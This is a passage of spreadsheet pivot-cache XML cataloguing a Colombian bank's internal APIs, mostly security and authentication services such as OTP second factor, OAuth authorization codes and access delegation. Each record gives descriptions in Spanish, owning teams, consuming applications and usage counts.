    <s v="La API permite consultar información actual de su plan y consumo de transacciones por medio de sus canales, en la cual se expondrán, los diferentes atributos que conforman la cuenta de ahorros y/o corrientes que tiene activa un cliente con el banco, información como marcación en el GMF, novedades acerca de su cuenta, cupos de sobregiro, los medios de pago asociados a la cuenta, su respectivo valor de la cuota de manejo, descuentos por convenios de nómina, un gestor de finanzas personales, información general y detallada de todos los beneficios del plan, entre otros."/>
    <s v="CLIENTES"/>
    <s v="Ecosistemas Clientes"/>
    <x v="31"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="GESTION DE PRECIOS_NU0091001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ MascaraTransaccional_NU0021001"/>
    <n v="9415030"/>
    <n v="8773075"/>
    <n v="8976006"/>
    <n v="8720360"/>
    <n v="10292915"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-02-04T11:53:49"/>
    <s v="Sales Product Agreement"/>
    <n v="201"/>
    <s v="Sales Product Agreement - Product Information"/>
    <n v="201"/>
    <x v="369"/>
    <s v="Este servicio expone información de los atributos y beneficios relacionados a los productos de Clientes Bancolombia. Atributos como la marcación del GMF, medios de pago asociados a la cuenta, valor de la cuota de manejo y el detalle relacionado con el cobro, particularidades sobre el tipo de plan e información de los beneficios tanto del tipo de cuenta como del plan, por ejemplo, bolsillos sin costo, canales de retiros, transferencias, descuentos por convenios de nómina, un gestor de finanzas personales e información especí­fica de los beneficios del medio de pago."/>
    <s v="CLIENTES"/>
    <s v="Ecosistemas Clientes"/>
    <x v="31"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="GESTION DE PRECIOS_NU0091001"/>
    <n v="9415030"/>
    <n v="8773075"/>
    <n v="8976006"/>
    <n v="8720360"/>
    <n v="10292915"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-07-13T11:32:21"/>
    <s v="Second Security Factor"/>
    <n v="101"/>
    <s v="Second Security Factor - Information"/>
    <n v="101"/>
    <x v="370"/>
    <s v="El api Second Security Factor - Information permite realizar la consulta del estado de un cliente en DID con base en su tipo y numero de documento."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="Autenticacion-para-VCAS_NU0101001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ One Click Payment_NU0199001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ PreaprobadosSucursales_AW1299001"/>
    <m/>
    <m/>
    <m/>
    <n v="1963"/>
    <n v="21262"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-07-13T11:32:21"/>
    <s v="Second Security Factor"/>
    <n v="101"/>
    <s v="Second Security Factor - Management"/>
    <n v="101"/>
    <x v="371"/>
    <s v="El api Second Security Factor - Management permite consumir las funcionalidades para generar un segundo fator ya sea OTP o PUSH, y autenticarlo, que significa confirmar su validez para continuar el proceso."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="Autenticacion-para-VCAS_NU0101001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ One Click Payment_NU0199001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ PreaprobadosSucursales_AW1299001"/>
    <n v="198450"/>
    <n v="218783"/>
    <n v="196134"/>
    <n v="216702"/>
    <n v="233026"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-10-26T14:36:16"/>
    <s v="Security"/>
    <n v="315"/>
    <s v="Security - Authorization Code"/>
    <n v="103"/>
    <x v="372"/>
    <s v="Esta API permite generar un código de autorización con el que posteriormente se puede solicitar un token (sesión) para que los consumidores puedan tranzar en los diferentes aplicativos del banco. Se puede generar usando las credenciales cifradas del cliente, es decir, cuando el Cliente se autentica.  El código de autorización garantiza que un cliente se autenticó de forma exitosa."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <s v="GenerarCodigoAutorizacionPorToken/V1.0_x000a_GestionCodigoAutorizacion/V1.0_x000a_GenerarCodigoAutorizacionPorCredenciales/V1.0"/>
    <m/>
    <s v="PEP_AW1281002 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ SVP_NU0004001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ FUA_AW1291001 _x000d__x000a_ HabitatCore_AW1281003 _x000d__x000a_ HDC_AW0453001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ ALM_AW0955 _x000d__x000a_ Networking_NU0046001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ NETWORKING_NU0046001 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ AdaptadorMarketplace_NU0143001 _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ SVECarteraComercial_NU0162001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ Security_AW1291001 _x000d__x000a_ SVN_NU0212001"/>
    <n v="40128175"/>
    <n v="35134289"/>
    <n v="38911106"/>
    <n v="38660405"/>
    <n v="44806196"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-02-23T23:50:06"/>
    <s v="Security"/>
    <n v="401"/>
    <s v="Security - Authorization Code"/>
    <n v="201"/>
    <x v="372"/>
    <s v="Esta API permite generar un código de autorización con el que posteriormente se puede solicitar un token (sesión) para que los consumidores puedan tranzar en los diferentes aplicativos del banco. Se puede generar usando las credenciales cifradas del cliente, es decir, cuando el Cliente se autentica.  El código de autorización garantiza que un cliente se autenticó de forma exitosa."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <m/>
    <s v="Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ NETWORKING_NU0046001 _x000d__x000a_ Kioscos_AW1272001 _x000d__x000a_ EDIN_AW1185001 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ HabitatCore_AW1281003 _x000d__x000a_ MigracionFUA_AW1291001 _x000d__x000a_ PortalAutogestionPyme_AW1287 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ AdaptadorMarketplace_NU0143001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ SVECarteraComercial_NU0162001 _x000d__x000a_ One Click Payment_NU0199001 _x000d__x000a_ HDC_AW0453001 _x000d__x000a_ Transversal_AW0937001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ BancolombiaPay_AW1435001 _x000d__x000a_ SVN_NU0212001 _x000d__x000a_ PEP_AW1281002 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ SVE_AW0360001 _x000d__x000a_ BNPL_NU0287001 _x000d__x000a_ Marketplacetu360HM_NU0035001 _x000d__x000a_ VINCUTRANS_NU0034001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ ModuloNegociosFiduciarios_NU0247001"/>
    <n v="40128175"/>
    <n v="35134289"/>
    <n v="38911106"/>
    <n v="38660405"/>
    <n v="44806196"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-06-02T11:12:53"/>
    <s v="Security"/>
    <n v="100"/>
    <s v="Security - Authorization Code"/>
    <n v="100"/>
    <x v="372"/>
    <s v="Esta API permite generar un código de autorización con el que posteriormente se puede solicitar un token (sesión) para que los consumidores puedan tranzar en los diferentes aplicativos del banco. Esta operación es conocida como Single Sing On."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <m/>
    <s v="MarketplaceEcosistemasPersonas_NU0035001"/>
    <n v="40128175"/>
    <n v="35134289"/>
    <n v="38911106"/>
    <n v="38660405"/>
    <n v="44806196"/>
    <s v="API ONPMS EXT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-10-26T14:36:16"/>
    <s v="Security"/>
    <n v="315"/>
    <s v="Security - Code Validation"/>
    <n v="311"/>
    <x v="373"/>
    <s v="Esta API permite realizar el proceso de autenticación OAuth 2.0 expuesto en WAS, por medio de la verificación de un código de autorización que es previamente generado y posteriormente enviado por el cliente, si el proceso es exitoso genera un access_token con este sistema de autenticación."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <s v="GestionAutenticacionOAuth2/V1.0"/>
    <s v="FUA-Front Unico de Autenticación_AW1291001, Servicio genérico de autenticación _AW1160001"/>
    <s v="PEP_AW1281002 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ SVP_NU0004001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ FUA_AW1291001 _x000d__x000a_ HabitatCore_AW1281003 _x000d__x000a_ HDC_AW0453001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ ALM_AW0955 _x000d__x000a_ Networking_NU0046001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ NETWORKING_NU0046001 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ AdaptadorMarketplace_NU0143001 _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ SVECarteraComercial_NU0162001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ Security_AW1291001 _x000d__x000a_ SVN_NU0212001"/>
    <n v="100867"/>
    <n v="142294"/>
    <n v="130189"/>
    <n v="262576"/>
    <n v="806818"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-02-11T01:01:30"/>
    <s v="Security"/>
    <n v="401"/>
    <s v="Security - Code Validation"/>
    <n v="401"/>
    <x v="373"/>
    <s v="Esta API permite realizar el proceso de autenticación OAuth 2.0 expuesto en WAS, por medio de la verificación de un código de autorización que es previamente generado y posteriormente enviado por el cliente, si el proceso es exitoso genera un access_token con este sistema de autenticación."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <m/>
    <s v="Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ NETWORKING_NU0046001 _x000d__x000a_ Kioscos_AW1272001 _x000d__x000a_ EDIN_AW1185001 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ HabitatCore_AW1281003 _x000d__x000a_ MigracionFUA_AW1291001 _x000d__x000a_ PortalAutogestionPyme_AW1287 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ AdaptadorMarketplace_NU0143001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ SVECarteraComercial_NU0162001 _x000d__x000a_ One Click Payment_NU0199001 _x000d__x000a_ HDC_AW0453001 _x000d__x000a_ Transversal_AW0937001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ BancolombiaPay_AW1435001 _x000d__x000a_ SVN_NU0212001 _x000d__x000a_ PEP_AW1281002 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ SVE_AW0360001 _x000d__x000a_ BNPL_NU0287001 _x000d__x000a_ Marketplacetu360HM_NU0035001 _x000d__x000a_ VINCUTRANS_NU0034001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ ModuloNegociosFiduciarios_NU0247001"/>
    <n v="100867"/>
    <n v="142294"/>
    <n v="130189"/>
    <n v="262576"/>
    <n v="806818"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-06-02T11:12:53"/>
    <s v="Security"/>
    <n v="100"/>
    <s v="Security - Code Validation"/>
    <n v="100"/>
    <x v="373"/>
    <s v="Esta API permite realizar el proceso de autenticación OAuth 2.0 expuesto en WAS, por medio de la verificación de un código de autorización que es previamente generado y posteriormente enviado por el cliente, si el proceso es exitoso genera un access_token con este sistema de autenticación."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <m/>
    <s v="MarketplaceEcosistemasPersonas_NU0035001"/>
    <n v="100867"/>
    <n v="142294"/>
    <n v="130189"/>
    <n v="262576"/>
    <n v="806818"/>
    <s v="API ONPMS EXT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-10-26T14:36:16"/>
    <s v="Security"/>
    <n v="315"/>
    <s v="Security - Encrypted Key"/>
    <n v="111"/>
    <x v="374"/>
    <s v="Esta API permite entregar a un consumidor la llave o el módulos para posteriormente con este dato realizar el cifrado del pin del cliente"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <s v="GestionLlaveCifrado/V1.0"/>
    <m/>
    <s v="PEP_AW1281002 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ SVP_NU0004001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ FUA_AW1291001 _x000d__x000a_ HabitatCore_AW1281003 _x000d__x000a_ HDC_AW0453001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ ALM_AW0955 _x000d__x000a_ Networking_NU0046001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ NETWORKING_NU0046001 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ AdaptadorMarketplace_NU0143001 _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ SVECarteraComercial_NU0162001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ Security_AW1291001 _x000d__x000a_ SVN_NU0212001"/>
    <n v="1777991"/>
    <n v="1508679"/>
    <n v="449661"/>
    <n v="449064"/>
    <n v="780572"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-07-08T23:29:06"/>
    <s v="Security"/>
    <n v="401"/>
    <s v="Security - Encrypted Key"/>
    <n v="201"/>
    <x v="374"/>
    <s v="Esta API permite entregar a un consumidor la llave o el módulos para posteriormente con este dato realizar el cifrado del pin del cliente"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <m/>
    <s v="Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ NETWORKING_NU0046001 _x000d__x000a_ Kioscos_AW1272001 _x000d__x000a_ EDIN_AW1185001 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ HabitatCore_AW1281003 _x000d__x000a_ MigracionFUA_AW1291001 _x000d__x000a_ PortalAutogestionPyme_AW1287 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ AdaptadorMarketplace_NU0143001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ SVECarteraComercial_NU0162001 _x000d__x000a_ One Click Payment_NU0199001 _x000d__x000a_ HDC_AW0453001 _x000d__x000a_ Transversal_AW0937001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ BancolombiaPay_AW1435001 _x000d__x000a_ SVN_NU0212001 _x000d__x000a_ PEP_AW1281002 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ SVE_AW0360001 _x000d__x000a_ BNPL_NU0287001 _x000d__x000a_ Marketplacetu360HM_NU0035001 _x000d__x000a_ VINCUTRANS_NU0034001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ ModuloNegociosFiduciarios_NU0247001"/>
    <n v="1777991"/>
    <n v="1508679"/>
    <n v="449661"/>
    <n v="449064"/>
    <n v="780572"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-08-18T23:14:28"/>
    <s v="Security"/>
    <n v="114"/>
    <s v="Security - Oauth provider"/>
    <n v="114"/>
    <x v="375"/>
    <s v="Proveedor de Oauth con flujo de aplicación para autenticación de la aplicación cliente que va a consumir las APIs"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <m/>
    <s v="APP Cayman _x000d__x000a_ Cayman_Soporte _x000d__x000a_ TMP EDIN APP_AW1276001 _x000d__x000a_ TEMP MAM_AW1204 _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ TMP2 johucorr_AW1185001 _x000d__x000a_ App inversionesGB_AW1185001 _x000d__x000a_ TMP1 johucorr_AW0360010 _x000d__x000a_ APOLO_AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro FE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-10-18T15:25:09"/>
    <s v="Security"/>
    <n v="202"/>
    <s v="Security - OAuth Provider from OTP"/>
    <n v="201"/>
    <x v="305"/>
    <s v="Expone los formularios para validar la identidad y autorización del usuario."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="GeneracionToken/V1.0"/>
    <s v="_x000a_PCC - Programas Comunes Canales_Generación y validación de pines_ISPCC0008"/>
    <s v="WorldRemit_WRT _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ Carventuri _x000d__x000a_ Uniteller_UTL _x000d__x000a_ BCHerramientasMonitoreo_AAA _x000d__x000a_ WOMPI _x000d__x000a_ TIGOUNE _x000d__x000a_ Tuya _x000d__x000a_ VIRGINMOBILEAPP _x000d__x000a_ SmallWorld_OMX _x000d__x000a_ Baguer SAS _x000d__x000a_ SERVICIOS DE SALUD IPS SURAMERICANA S.A.S. _x000d__x000a_ OPERACIONES GENERALES SURAMERICANA SAS _x000d__x000a_ SERVICIOS GENERALES SURAMERICANA S.A.S. _x000d__x000a_ CONSULTORIA EN GESTION DE RIESGOS SURAMERICANA _x000d__x000a_ SEGUROS GENERALES SURAMERICANA SA _x000d__x000a_ SEGUROS DE VIDA SURAMERICANA SA _x000d__x000a_ EPS SURAMERICANA S.A. _x000d__x000a_ FONYOU COLOMBIA SAS _x000d__x000a_ INVERSORA EBCO APP _x000d__x000a_ ABC PAGOS _x000d__x000a_ LYRAAPP _x000d__x000a_ CLAROAPP _x000d__x000a_ SUPERPAGOSAPP _x000d__x000a_ ZONA PAGOS _x000d__x000a_ Place to Pay _x000d__x000a_ T atiendo Boton Bancolombia _x000d__x000a_ Boton Bancolombia _x000d__x000a_ E-collect _x000d__x000a_ App_Blendex_BotonBancolombia _x000d__x000a_ ofrendaappbc _x000d__x000a_ ALKOSTO BOTON BANCOLOMBIA _x000d__x000a_ WOMPI APP _x000d__x000a_ COMFAMA APP _x000d__x000a_ SISTECREDITO SAS _x000d__x000a_ PAYMENTEZ APP _x000d__x000a_ FONVALMED"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-10-22T14:58:44"/>
    <s v="Security"/>
    <n v="202"/>
    <s v="Security - OAuth Provider from OTP Pymes"/>
    <n v="101"/>
    <x v="306"/>
    <s v="Proveedor de OAuth2 para autenticación con One Time Password (OTP) para Pymes"/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <s v="SOA y APIs"/>
    <x v="8"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="WorldRemit_WRT _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ Carventuri _x000d__x000a_ Uniteller_UTL _x000d__x000a_ BCHerramientasMonitoreo_AAA _x000d__x000a_ WOMPI _x000d__x000a_ TIGOUNE _x000d__x000a_ Tuya _x000d__x000a_ VIRGINMOBILEAPP _x000d__x000a_ SmallWorld_OMX _x000d__x000a_ Baguer SAS _x000d__x000a_ SERVICIOS DE SALUD IPS SURAMERICANA S.A.S. _x000d__x000a_ OPERACIONES GENERALES SURAMERICANA SAS _x000d__x000a_ SERVICIOS GENERALES SURAMERICANA S.A.S. _x000d__x000a_ CONSULTORIA EN GESTION DE RIESGOS SURAMERICANA _x000d__x000a_ SEGUROS GENERALES SURAMERICANA SA _x000d__x000a_ SEGUROS DE VIDA SURAMERICANA SA _x000d__x000a_ EPS SURAMERICANA S.A. _x000d__x000a_ FONYOU COLOMBIA SAS _x000d__x000a_ INVERSORA EBCO APP _x000d__x000a_ ABC PAGOS _x000d__x000a_ LYRAAPP _x000d__x000a_ CLAROAPP _x000d__x000a_ SUPERPAGOSAPP _x000d__x000a_ ZONA PAGOS _x000d__x000a_ Place to Pay _x000d__x000a_ T atiendo Boton Bancolombia _x000d__x000a_ Boton Bancolombia _x000d__x000a_ E-collect _x000d__x000a_ App_Blendex_BotonBancolombia _x000d__x000a_ ofrendaappbc _x000d__x000a_ ALKOSTO BOTON BANCOLOMBIA _x000d__x000a_ WOMPI APP _x000d__x000a_ COMFAMA APP _x000d__x000a_ SISTECREDITO SAS _x000d__x000a_ PAYMENTEZ APP _x000d__x000a_ FONVALMED"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-05-24T14:53:11"/>
    <s v="Security Access Entitlement"/>
    <n v="100"/>
    <s v="Security Access Entitlement - Memberships"/>
    <n v="100"/>
    <x v="376"/>
    <s v="Esta API permite validar y regenerar el código íºnico de afiliación; este código está relacionado al documento del usuario delegado que se está creando y el cliente. Hace parte del proceso de delegación de acceso a los contenidos y/o funcionalidades de los canales Bancolombia y debe ser exitoso para que se efectíºe la delegación."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-05-24T14:53:11"/>
    <s v="Security Access Entitlement"/>
    <n v="100"/>
    <s v="Security Access Entitlement - Relations"/>
    <n v="100"/>
    <x v="377"/>
    <s v="Esta API permite la consulta de la relación que tiene un cliente de los segmentos personas o empresas con las siguientes caracterí­sticas: Si está actuando bajo nombre propio, si es una persona natural, si es una persona jurí­dica. Validando así­ las delegaciones que tenga un titular a un usuario delegado.  De tal forma que permite decidir si la persona, tiene permiso para acceder a productos propios o delegados por terceros, bajo un nivel de privilegios asignados a un rol."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-10-05T10:01:03"/>
    <s v="Security Access Entitlement Delegates"/>
    <n v="100"/>
    <s v="Security Access Entitlement Delegates - Information"/>
    <n v="100"/>
    <x v="378"/>
    <s v="Esta API permite la consulta de un usuario delegado. indicando su identidad, rol, privilegios asignados, grupo de productos asociados, recursos asignados y el estado. De tal forma que permite validar si la persona, tiene permiso para acceder a productos no propios otorgados por el dueí±o del producto o representante legal."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="Entitlement_NU0141001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-10-05T10:01:03"/>
    <s v="Security Access Entitlement Delegates"/>
    <n v="100"/>
    <s v="Security Access Entitlement Delegates - Management"/>
    <n v="100"/>
    <x v="379"/>
    <s v="Esta API permite la gestión de un usuario delegado persona natural y persona jurí­dica.Se tiene una operación de crear la relación de un usuario delegado con un cliente persona natural y la relación de un usuario delegado con un cliente persona jurí­dica.La capacidad de eliminar es transversal para las relaciones de delegado con un cliente persona natural y la relación de un usuario delegado con un cliente persona jurí­dica."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="Entitlement_NU0141001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-10-05T09:54:26"/>
    <s v="Security Access Entitlement Owners"/>
    <n v="100"/>
    <s v="Security Access Entitlement Owners - Information"/>
    <n v="100"/>
    <x v="380"/>
    <s v="Esta API permite la consulta de un usuario titular persona natural y persona jurí­dica. indicando su identidad, rol, privilegios asignados, grupo de productos asociados, recursos asignados y el estado. De tal forma que permite validar si la persona, tiene permiso para acceder a productos propios 'como dueí±o del producto o representante legal."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="Entitlement_NU0141001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-10-05T09:54:26"/>
    <s v="Security Access Entitlement Owners"/>
    <n v="100"/>
    <s v="Security Access Entitlement Owners - Management"/>
    <n v="100"/>
    <x v="381"/>
    <s v="Esta API permite la gestión de un usuario titular persona natural y persona jurí­dica. Se tienen dos operaciones de crear la relación de un usuario titular con un cliente persona natural y la relación de un usuario titular con un cliente persona jurí­dica.La capacidad de eliminar es transversal para las relaciones de titular con un cliente persona natural y la relación de un usuario titular con un cliente persona jurí­dica."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="Entitlement_NU0141001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-03-29T14:55:26"/>
    <s v="Security Access Entitlement Privileges"/>
    <n v="100"/>
    <s v="Security Access Entitlement Privileges - Information"/>
